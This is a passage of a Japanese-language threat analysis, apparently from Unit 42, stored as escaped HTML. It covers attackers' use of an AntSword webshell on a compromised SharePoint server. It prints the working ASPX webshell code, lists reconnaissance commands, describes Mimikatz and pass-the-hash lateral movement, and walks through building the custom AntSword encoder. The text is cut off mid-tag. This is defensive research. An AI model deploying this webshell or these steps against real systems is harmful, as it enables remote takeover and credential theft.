id=\"post-103727-actors-antsword-webshell\"><\/a>\u653b\u6483\u8005\u306eAntSword webshell<\/h3>\n<p>AntSword\u306f\u30e2\u30b8\u30e5\u30e9\u30fc\u578b\u306ewebshell\u3067\u3001\u4fb5\u5bb3\u3057\u305f\u30b5\u30fc\u30d0\u30fc\u306b\u653b\u6483\u8005\u304c\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3059\u308b\u3054\u304f\u5358\u7d14\u306awebshell\u3068\u3001AntSword Shell Manager\u3068\u547c\u3070\u308c\u308b\u30af\u30e9\u30a4\u30a2\u30f3\u30c8\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u4ed6\u306e\u591a\u304f\u306ewebshell\u306f\u30d6\u30e9\u30a6\u30b6\u30a6\u30a3\u30f3\u30c9\u30a6\u3067\u5bfe\u8a71\u3057\u307e\u3059\u304c\u3001\u3053\u308c\u306f\u30af\u30e9\u30a4\u30a2\u30f3\u30c8\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u3092\u4f7f\u7528\u3059\u308b\u70b9\u3067\u307b\u304b\u3068\u7570\u306a\u3063\u3066\u3044\u307e\u3059\u3002\u653b\u6483\u8005\u306fAntSword Shell Manager\u3092\u4f7f\u7528\u3057\u3066\u4fb5\u5bb3\u3057\u305f\u30b5\u30fc\u30d0\u30fc\u4e0a\u306eAntSword webshell\u3068\u5bfe\u8a71\u3057\u307e\u3059\u3002Shell Manager\u306f\u9069\u5207\u306a\u30b9\u30af\u30ea\u30d7\u30c8\u3092webshell\u306b\u9001\u4fe1\u3057\u3001\u3053\u308c\u306b\u3088\u3063\u3066webshell\u304c\u76ee\u7684\u306e\u30a2\u30af\u30b7\u30e7\u30f3\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002\u3053\u306e\u653b\u6483\u3067\u5c55\u958b\u3055\u308c\u305fbitreeview.aspx\u3068\u3044\u3046AntSword webshell\uff08SHA256\uff1a15ecb6ac6c637b58b2114e6b21b5b18b0c9f5341ee74b428b70e17e64b7da55e\uff09\u304c\u3069\u306e\u304f\u3089\u3044\u6a5f\u80fd\u3092\u524a\u304e\u843d\u3068\u3055\u308c\u305f\u30b7\u30a7\u30eb\u3067\u3042\u308b\u304b\u3092\u308f\u304b\u308a\u3084\u3059\u304f\u8868\u73fe\u3059\u308b\u306a\u3089\u3001\u3053\u306ewebshell\u306e\u30b5\u30a4\u30ba\u306f\u305f\u3063\u305f162\u30d0\u30a4\u30c8\u3067\u3001\u542b\u307e\u308c\u3066\u3044\u308b\u306e\u306f\u4ee5\u4e0b\u306e\u307f\u3067\u3059\u3002<\/p>\n<pre class=\"\">%@ Page Language=\"Jscript\"%\r\n \r\n \r\n% \r\n \r\neval(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.\r\nFromBase64String(Request.Item[\"Darr1R1ng\"])),\"unsafe\"); %\r\n<\/pre>\n<p>\u4e0a\u8a18\u306e\u30b3\u30fc\u30c9\u304b\u3089\u308f\u304b\u308b\u3088\u3046\u306b\u3001AntSword webshell\u306b\u306f\u3001AntSword Shell Manager\u304b\u3089\u63d0\u4f9b\u3055\u308c\u305f\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u5b9f\u884c\u3059\u308b\u4ee5\u5916\u306e\u6a5f\u80fd\u306f\u3042\u308a\u307e\u305b\u3093\u3002\u5177\u4f53\u7684\u306b\u306f\u3001HTTP POST\u30ea\u30af\u30a8\u30b9\u30c8\u306eDarr1R1ng\u3068\u3044\u3046\u540d\u524d\u306e\u30d5\u30a3\u30fc\u30eb\u30c9\u306b\u542b\u307e\u308c\u308b\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u5b9f\u884c\u3059\u308b\u6a5f\u80fd\u306e\u307f\u3092\u6301\u3061\u307e\u3059\u3002\u4e0a\u8a18\u306e\u30b3\u30fc\u30c9\u306f\u307e\u305f\u3001\u653b\u6483\u8005\u304cAntSword Shell Manager\u5185\u3067\u72ec\u81ea\u306e\u30ab\u30b9\u30bf\u30e0\u300c\u30a8\u30f3\u30b3\u30fc\u30c0\u300d\u3092\u4f5c\u6210\u3057\u3066\u540c\u30b3\u30fc\u30c9\u3068\u5bfe\u8a71\u3067\u304d\u308b\u3088\u3046\u306b\u3057\u305f\u3053\u3068\u3092\u793a\u3059\u3082\u306e\u3067\u3082\u3042\u308a\u307e\u3059\u3002\u3053\u308c\u306b\u3064\u3044\u3066\u306f\u3001\u6b21\u306e\u30bb\u30af\u30b7\u30e7\u30f3\u3067\u8a73\u3057\u304f\u8aac\u660e\u3057\u307e\u3059\u3002<\/p>\n<p>\u653b\u6483\u8005\u306f\u3001AntSword Webshell\u3092\u4f7f\u7528\u3057\u3001\u4fb5\u5bb3\u3057\u305f\u30b5\u30fc\u30d0\u30fc\u4e0a\u3067\u3055\u307e\u3056\u307e\u306a\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3057\u3066\u3044\u307e\u3057\u305f\u3002\u4ee5\u4e0b\u306f\u3001\u3053\u306ewebshell\u3092\u4f7f\u7528\u3057\u3066\u767a\u884c\u3055\u308c\u308b\u521d\u671f\u30b3\u30de\u30f3\u30c9\u306e\u4e00\u89a7\u3067\u3059\u3002\u3053\u308c\u3089\u306e\u30b3\u30de\u30f3\u30c9\u306f\u3001\u521d\u671f\u306e\u30b7\u30b9\u30c6\u30e0\u3084\u30e6\u30fc\u30b6\u30fc\u306e\u767a\u898b\u3001\u5bfe\u8c61\u30b7\u30b9\u30c6\u30e0\u3078\u306eping\u3092\u8a66\u307f\u308b\u3082\u306e\u3067\u3059\u3002<\/p>\n<ol>\n<li>whoami<\/li>\n<li>query user<\/li>\n<li>nltest \/domain_Trusts<\/li>\n<li>ping -n 1 &lt;redacted domain name&gt;<\/li>\n<li>ipconfig \/all<\/li>\n<li>net group \/do<\/li>\n<li>net group Exchange Servers \/do<\/li>\n<li>ing -n 1 &lt;redacted hostname of Exchange server&gt;<\/li>\n<li>ping -n 1 &lt;redacted hostname of Exchange server&gt;<\/li>\n<li>query user<\/li>\n<\/ol>\n<p>ping\u306e\u8a66\u884c\u306f\u3001\u3053\u306e\u653b\u6483\u8005\u304cMicrosoft Exchange\u30b5\u30fc\u30d0\u30fc\u3078\u306e\u30a2\u30af\u30bb\u30b9\u3092\u53d6\u5f97\u3057\u3088\u3046\u3068\u3057\u3066\u3044\u308b\u3053\u3068\u3092\u793a\u5506\u3057\u3066\u3044\u307e\u3059\u3002Microsoft Exchange\u30b5\u30fc\u30d0\u30fc\u3078\u306e\u30a2\u30af\u30bb\u30b9\u53d6\u5f97\u306f\u76ee\u7684\u306e\u4e00\u90e8\u3067\u3042\u3063\u305f\u304b\u3001Microsoft Exchange\u30b5\u30fc\u30d0\u30fc\u304c\u5b58\u5728\u3059\u308b\u30c9\u30e1\u30a4\u30f3\u3067\u6607\u683c\u3057\u305f\u7279\u6a29\u3092\u72d9\u3063\u3066\u3044\u305f\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002\u307e\u305f\u3053\u306eping\u306e\u6700\u521d\u306e\u8a66\u884c\u3067\u653b\u6483\u8005\u306f\u30b3\u30de\u30f3\u30c9\u306e\u30b9\u30da\u30eb\u3092\u9593\u9055\u3048\u3066\u3044\u307e\u3057\u305f\u3002\u3053\u306e\u3053\u3068\u304b\u3089\u3001\u3053\u308c\u3089\u30b3\u30de\u30f3\u30c9\u304c\u81ea\u52d5\u30b9\u30af\u30ea\u30d7\u30c8\u3067\u306f\u306a\u304f\u30ad\u30fc\u30dc\u30fc\u30c9\u304b\u3089\u624b\u3067\u5165\u529b\u3055\u308c\u305f\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3059\u3002\u56f32\u306f\u3001AntSword Shell Manager\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u5185\u306e\u30bf\u30fc\u30df\u30ca\u30eb\u30a4\u30f3\u30bf\u30fc\u30d5\u30a7\u30a4\u30b9\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002\u653b\u6483\u8005\u306f\u3001\u3053\u306e\u30a4\u30f3\u30bf\u30fc\u30d5\u30a7\u30a4\u30b9\u7d4c\u7531\u3067\u30b3\u30de\u30f3\u30c9\u3092\u767a\u884c\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<p><img width=\"1024\" height=\"682\"  class=\"wp-image-103732 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-2-terminal-within-antswords-shell-manager.png\" alt=\"Figure 2 Terminal within AntSword's Shell Manager interacting with webshell\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-2-terminal-within-antswords-shell-manager.png 1024w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-2-terminal-within-antswords-shell-manager-300x200.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-2-terminal-within-antswords-shell-manager-768x512.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-2-terminal-within-antswords-shell-manager-900x599.png 900w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-2-terminal-within-antswords-shell-manager-370x246.png 370w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\">\u56f32 webShell\u3068\u5bfe\u8a71\u3059\u308bAntSword Shell Manager\u306e\u30bf\u30fc\u30df\u30ca\u30eb<\/span><\/p>\n<p>\u5b8c\u5168\u306a\u53ef\u8996\u6027\u306f\u306a\u304b\u3063\u305f\u3082\u306e\u306e\u3001\u79c1\u305f\u3061\u306f\u3053\u306e\u653b\u6483\u8005\u304cAntSword webshell\u3092\u4f7f\u7528\u3057\u3066\u30b5\u30fc\u30d0\u30fc\u306b\u30c4\u30fc\u30eb\u985e\u3001\u3059\u306a\u308f\u3061cURL\u3001\u30ab\u30b9\u30bf\u30de\u30a4\u30ba\u3057\u305fMimikatz\u4e9c\u7a2e\u3001\u30b3\u30f3\u30d1\u30a4\u30eb\u6e08\u307fImpacket <a href=\"https:\/\/github.com\/SecureAuthCorp\/impacket\/blob\/master\/examples\/wmiexec.py\">wmiexec<\/a>\u4e9c\u7a2e\u3001<a href=\"https:\/\/github.com\/SecureAuthCorp\/impacket\/blob\/master\/examples\/atexec.py\">atexec<\/a>\u306a\u3069\u3092\u30b5\u30fc\u30d0\u30fc\u306b\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3057\u3066\u3044\u305f\u3082\u306e\u3068\u8003\u3048\u3066\u3044\u307e\u3059\u3002AntSword\u306b\u306f\u3001Windows\u30a8\u30af\u30b9\u30d7\u30ed\u30fc\u30e9\u30fc\u306b\u4f3c\u305f\u30ca\u30d3\u30b2\u30fc\u30b7\u30e7\u30f3\u6a5f\u80fd\u3092\u63d0\u4f9b\u3059\u308bFileManager\u30a4\u30f3\u30bf\u30fc\u30d5\u30a7\u30a4\u30b9\u304c\u5099\u308f\u3063\u3066\u3044\u307e\u3059\u3002\u3053\u308c\u306b\u3088\u308a\u653b\u6483\u8005\u306f\u4fb5\u5bb3\u3057\u305f\u30b5\u30fc\u30d0\u30fc\u3068\u306e\u9593\u3067\u30d5\u30a1\u30a4\u30eb\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\/\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\u56f33\u306f\u3001AntSword Shell Manager\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u306eFileManager\u30a4\u30f3\u30bf\u30fc\u30d5\u30a7\u30a4\u30b9\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<p><img width=\"1024\" height=\"680\"  class=\"wp-image-103734 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-3-filemanager-interface-within-antswords-s.png\" alt=\"Figure 3 FileManager interface within AntSword's Shell Manager using the webshell\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-3-filemanager-interface-within-antswords-s.png 1024w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-3-filemanager-interface-within-antswords-s-300x199.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-3-filemanager-interface-within-antswords-s-768x510.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-3-filemanager-interface-within-antswords-s-900x598.png 900w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-3-filemanager-interface-within-antswords-s-370x246.png 370w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\">\u56f33 webshell\u3092\u4f7f\u7528\u3059\u308bAntSword Shell Manager\u306eFileManager\u30a4\u30f3\u30bf\u30fc\u30d5\u30a7\u30a4\u30b9<\/span><\/p>\n<p>\u653b\u6483\u8005\u306f\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3055\u308c\u305f\u3053\u308c\u3089\u30c4\u30fc\u30eb\u3092\u4f7f\u7528\u3057\u3066webshell\u306b\u30b3\u30de\u30f3\u30c9\u3092\u767a\u884c\u3057\u3066\u3044\u307e\u3057\u305f\u3002\u305f\u3068\u3048\u3070\u3001cURL\u30c4\u30fc\u30eb\u306f <span style=\"font-family: 'courier new', courier, monospace;\">curl.exe ipinfo.io --max\u2013time 5<\/span> \u3068\u3044\u3046\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3059\u308b\u306e\u306b\u4f7f\u7528\u3055\u308c\u3001\u3053\u308c\u306b\u3088\u308a\u30b5\u30fc\u30d0\u30fc\u304c\u30a4\u30f3\u30bf\u30fc\u30cd\u30c3\u30c8\u3078\u306e\u30a2\u30a6\u30c8\u30d0\u30a6\u30f3\u30c9\u30a2\u30af\u30bb\u30b9\u3092\u6301\u3063\u3066\u3044\u308b\u304b\u3069\u3046\u304b\u3092\u5224\u65ad\u3057\u3001\u4fb5\u5bb3\u3055\u308c\u305f\u30b7\u30b9\u30c6\u30e0\u306e\u5916\u90e8IP\u30a2\u30c9\u30ec\u30b9\u3092\u53d6\u5f97\u3059\u308b\u306e\u306b\u4f7f\u308f\u308c\u3066\u3044\u307e\u3057\u305f\u3002\u653b\u6483\u8005\u306f<span style=\"font-family: 'courier new', courier, monospace;\">net use<\/span>\u30b3\u30de\u30f3\u30c9\u3084Mimikatz\u3001Impacket\u3068\u3044\u3063\u305f\u30c4\u30fc\u30eb\u3092\u3068\u304f\u306b\u6a2a\u5c55\u958b\u306e\u305f\u3081\u306b\u4f7f\u3063\u3066\u3044\u307e\u3057\u305f\u3002\u653b\u6483\u8005\u306f\u30e1\u30e2\u30ea\u304b\u3089\u8cc7\u683c\u60c5\u5831\u3092\u30c0\u30f3\u30d7\u3059\u308b\uff08<a href=\"https:\/\/attack.mitre.org\/techniques\/T1003\/\">T1003<\/a>\uff09\u305f\u3081\u306bMimikatz\u3092\u4f7f\u7528\u3057\u3001Pass-The-Hash\u30c6\u30af\u30cb\u30c3\u30af\uff08<a href=\"https:\/\/attack.mitre.org\/techniques\/T1075\/\">T1075<\/a>\uff09\u306b\u3088\u3063\u3066\u4ed6\u306e\u30b7\u30b9\u30c6\u30e0\u4e0a\u3067\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3059\u308b\u305f\u3081\u306bImpacket\u30c4\u30fc\u30eb\u3092\u4f7f\u3063\u305f\u3088\u3046\u3067\u3059\u3002<\/p>\n<h3><a id=\"post-103727-actors-custom-antsword-encoder\"><\/a>\u653b\u6483\u8005\u306e\u30ab\u30b9\u30bf\u30e0AntSword\u30a8\u30f3\u30b3\u30fc\u30c0<\/h3>\n<p>SharePoint\u30b5\u30fc\u30d0\u30fc\u306b\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u305fAntSword webshell\u3092\u4f7f\u7528\u3059\u308b\u305f\u3081\u3001\u653b\u6483\u8005\u306fAntSword\u306b\u30ab\u30b9\u30bf\u30e0\u30a8\u30f3\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0\u30e2\u30b8\u30e5\u30fc\u30eb\u3092\u4f5c\u6210\u3059\u308b\u5fc5\u8981\u304c\u3042\u308a\u307e\u3057\u305f\u3002\u306a\u305c\u305d\u308c\u304c\u308f\u304b\u308b\u304b\u3068\u3044\u3048\u3070\u3001AntSword Shell Manager\u306e\u30c7\u30d5\u30a9\u30eb\u30c8\u30a8\u30f3\u30b3\u30fc\u30c0\u3067\u306fbitreeview.aspxwebshell\u3068\u3046\u307e\u304f\u5bfe\u8a71\u304c\u3067\u304d\u306a\u3044\u304b\u3089\u3067\u3059\u3002\u30c7\u30d5\u30a9\u30eb\u30c8\u306ebase64\u30a8\u30f3\u30b3\u30fc\u30c0\u3067\u3042\u308c\u3070\u3001Darr1R1ng\u30d5\u30a3\u30fc\u30eb\u30c9\u5185\u306ebase64\u30a8\u30f3\u30b3\u30fc\u30c9\u3057\u305f\u30c7\u30fc\u30bf\u3068\u3057\u3066\u3067\u306f\u306a\u304f\u3001\u30af\u30ea\u30a2\u30c6\u30ad\u30b9\u30c8\u3068\u3057\u3066\u30c7\u30fc\u30bf\u3092\u9001\u4fe1\u3057\u307e\u3059\uff08\u56f34\u53c2\u7167\uff09\u3002\u79c1\u305f\u3061\u306f\u30c7\u30d5\u30a9\u30eb\u30c8\u306ebase64\u30a8\u30f3\u30b3\u30fc\u30c0\u3092\u4f7f\u7528\u3057\u3001\u8105\u5a01\u653b\u6483\u8005\u304c\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3057\u305fwebshell\u3001bitreeview.aspx\u3068\u306e\u5bfe\u8a71\u3092\u8a66\u307f\u307e\u3057\u305f\u304c\u3001\u30af\u30ea\u30a2\u30c6\u30ad\u30b9\u30c8\u306eDarr1R1ng\u30d5\u30a3\u30fc\u30eb\u30c9\u306bbase64\u30a2\u30eb\u30d5\u30a1\u30d9\u30c3\u30c8\u4ee5\u5916\u306e\u6587\u5b57\u304c\u542b\u307e\u308c\u3066\u3044\u308b\u5834\u5408\u3001\u30b5\u30fc\u30d0\u30fc\u306fHTTP 500\u30a8\u30e9\u30fc\u30e1\u30c3\u30bb\u30fc\u30b8\u3067\u5fdc\u7b54\u3057\u3066\u304d\u307e\u3057\u305f\u3002<\/p>\n<p><img width=\"913\" height=\"286\"  class=\"wp-image-103736 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-4-http-post-request-issued-by-antsword-shel.png\" alt=\"Figure 4 HTTP POST request issued by AntSword Shell Manager to webshell using default base64 encoder\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-4-http-post-request-issued-by-antsword-shel.png 913w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-4-http-post-request-issued-by-antsword-shel-300x94.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-4-http-post-request-issued-by-antsword-shel-768x241.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-4-http-post-request-issued-by-antsword-shel-900x282.png 900w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-4-http-post-request-issued-by-antsword-shel-370x116.png 370w\" sizes=\"(max-width: 913px) 100vw, 913px\" \/><\/p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\">\u56f34 \u30c7\u30d5\u30a9\u30eb\u30c8base64\u30a8\u30f3\u30b3\u30fc\u30c0\u3092\u4f7f\u7528\u3057\u3066AntSword Shell Manager\u304b\u3089webshell\u306b\u767a\u884c\u3055\u308c\u305fHTTP POST\u30ea\u30af\u30a8\u30b9\u30c8<\/span><\/p>\n<p>\u3053\u306e\u3053\u3068\u304b\u3089\u3001\u653b\u6483\u8005\u306fAntSword Shell Manager\u7528\u306b\u30ab\u30b9\u30bf\u30e0\u30a8\u30f3\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0\u30e2\u30b8\u30e5\u30fc\u30eb\u3092\u4f5c\u6210\u3057\u3001Darr1R1ng\u30d5\u30a3\u30fc\u30eb\u30c9\u5168\u4f53\u3092base64\u30a8\u30f3\u30b3\u30fc\u30c9\u3057\u3066\u3044\u305f\u306b\u9055\u3044\u306a\u3044\u3068\u5224\u65ad\u3057\u307e\u3057\u305f\u3002\u305d\u308c\u306b\u3088\u308a\u3001bitreeview.aspx webshell\u3068\u6b63\u5e38\u306b\u5bfe\u8a71\u3067\u304d\u308b\u3088\u3046\u306b\u306a\u308a\u307e\u3059\u3002AntSword Shell Manager\u306b\u306f\u3001\u30e6\u30fc\u30b6\u30fc\u304c\u30ab\u30b9\u30bf\u30e0\u30a8\u30f3\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0\u30e2\u30b8\u30e5\u30fc\u30eb\u3092\u4f5c\u6210\u3059\u308b\u305f\u3081\u306e\u30a4\u30f3\u30bf\u30fc\u30d5\u30a7\u30a4\u30b9\u304c\u7528\u610f\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u305d\u3053\u3067\u79c1\u305f\u3061\u306f\u3001\u653b\u6483\u8005\u304c\u30ab\u30b9\u30bf\u30e0\u30a8\u30f3\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0\u3092\u4f5c\u6210\u3057\u3001webshell\u3068\u306e\u5bfe\u8a71\u304c\u3067\u304d\u308b\u3088\u3046\u306b\u3059\u308b\u307e\u3067\u306b\u5b9f\u884c\u3057\u305f\u624b\u9806\u304c\u3069\u306e\u3088\u3046\u306a\u3082\u306e\u3067\u3042\u3063\u305f\u304b\u3092\u78ba\u8a8d\u3057\u3066\u307f\u308b\u3053\u3068\u306b\u3057\u307e\u3057\u305f\u3002<\/p>\n<p>1. \u653b\u6483\u8005\u306f\u307e\u305a\u3001AntSword Shell Manager\u3092\u958b\u304f\u3053\u3068\u304b\u3089\u59cb\u3081\u307e\u3059\u3002\u79c1\u305f\u3061\u306e\u5206\u6790\u304b\u3089\u306f\u3001\u5177\u4f53\u7684\u306b\u306fAntSword v2.1\u3092\u4f7f\u7528\u3057\u305f\u3082\u306e\u3068\u601d\u308f\u308c\u307e\u3059\u3002 <img width=\"1051\" height=\"552\"  class=\"wp-image-103738 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-24.png\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-24.png 1051w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-24-300x158.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-24-1024x538.png 1024w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-24-768x403.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-24-900x473.png 900w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-24-370x194.png 370w\" sizes=\"(max-width: 1051px) 100vw, 1051px\" \/> 2. \u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u305fwebshell\u3068\u5bfe\u8a71\u3059\u308b\u524d\u306b\u3001\u30ab\u30b9\u30bf\u30e0\u30a8\u30f3\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0\u30e2\u30b8\u30e5\u30fc\u30eb\u3092\u4f5c\u6210\u3059\u308b\u5fc5\u8981\u304c\u3042\u308a\u307e\u3059\u3002\u305d\u3053\u3067\u3001\u30e1\u30cb\u30e5\u30fc\u304b\u3089AntSword\u3001Encoders manager\u306e\u9806\u306b\u30af\u30ea\u30c3\u30af\u3057\u307e\u3059\u3002<\/p>\n<p><img width=\"1049\" height=\"552\"  class=\"wp-image-103740 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-25.png\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-25.png 1049w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-25-300x158.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-25-1024x539.png 1024w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-25-768x404.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-25-900x474.png 900w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-25-370x195.png 370w\" sizes=\"(max-width: 1049px) 100vw, 1049px\" \/><\/p>\n<p>3. Encoder Manager\u30a4\u30f3\u30bf\u30fc\u30d5\u30a7\u30a4\u30b9\u3067[New Encoder]\u30dc\u30bf\u30f3\u3092\u30af\u30ea\u30c3\u30af\u3057\u307e\u3059\u3002<\/p>\n<p><img width=\"1052\" height=\"553\"  class=\"wp-image-103742 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-26.png\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-26.png 1052w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-26-300x158.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-26-1024x538.png 1024w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-26-768x404.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-26-900x473.png 900w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-26-370x194.png 370w\" sizes=\"(max-width: 1052px) 100vw, 1052px\" \/><\/p>\n<p>4. \u6b21\u306b\u653b\u6483\u8005\u306f\u3001[New Encoder]\u30c9\u30ed\u30c3\u30d7\u30c0\u30a6\u30f3\u304b\u3089\u300cASPX\u300d\u3092\u9078\u629e\u3057\u305f\u3068\u601d\u308f\u308c\u307e\u3059\u3002\u305d\u306e\u7406\u7531\u306f\u3001SharePoint\u30b5\u30fc\u30d0\u30fc\u306b\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u305fAntSword webshell\u304cASPX\u30d5\u30a1\u30a4\u30eb\u3060\u3063\u305f\u304b\u3089\u3067\u3059\u3002<\/p>\n<p><img width=\"1053\" height=\"551\"  class=\"wp-image-103744 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-27.png\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-27.png 1053w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-27-300x157.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-27-1024x536.png 1024w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-27-768x402.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-27-900x471.png 900w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-27-370x194.png 370w\" sizes=\"(max-width: 1053px) 100vw, 1053px\" \/><\/p>\n<p>5. \u6b21\u306b\u653b\u6483\u8005\u306f\u3001\u65b0\u3057\u3044\u30a8\u30f3\u30b3\u30fc\u30c0\u306b\u540d\u524d\u3092\u4ed8\u3051\u3001\u9752\u3044\u30dc\u30bf\u30f3\u3092\u30af\u30ea\u30c3\u30af\u3057\u3066\u7d9a\u884c\u3057\u307e\u3059\u3002\u3053\u306e\u4f8b\u3067\u79c1\u305f\u3061\u306f\u30c7\u30d5\u30a9\u30eb\u30c8\u540d\u300cmyencoder\u300d\u3092\u9078\u629e\u3057\u307e\u3057\u305f\u3002<\/p>\n<p><img width=\"1051\" height=\"551\"  class=\"wp-image-103746 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-28.png\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-28.png 1051w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-28-300x157.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-28-1024x537.png 1024w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-28-768x403.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-28-900x472.png 900w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-28-370x194.png 370w\" sizes=\"(max-width: 